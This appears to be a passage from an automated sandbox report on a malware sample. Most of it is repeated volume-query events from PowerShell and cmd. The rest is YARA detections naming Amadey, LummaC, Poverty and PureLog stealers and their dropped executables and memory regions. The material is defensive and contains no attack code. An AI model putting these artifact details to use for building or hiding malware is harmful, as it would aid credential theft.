Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F7CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_00F7CBEA

Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe

Code function: 7_2_00405573 GetVersionExW,GetVersionExW,

7_2_00405573

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\artVssK[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1032645001\artVssK.exe, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 94.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.skotes.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 93.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 56.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.2.483d2fa8a0d53818306efeb32d3.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2603863447.0000000000081000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 0000005E.00000002.2799418989.0000000000081000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 0000005D.00000002.2891041549.0000000000081000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 0000004C.00000002.2707806228.0000000000081000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Poverty Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1032914001\ZNWzk16.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ZNWzk16[1].exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1032672001\VDoTjfk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VDoTjfk[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1032624001\tbd0KQd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tbd0KQd[1].exe, type: DROPPED

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Poverty Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1032914001\ZNWzk16.exe, type: DROPPED
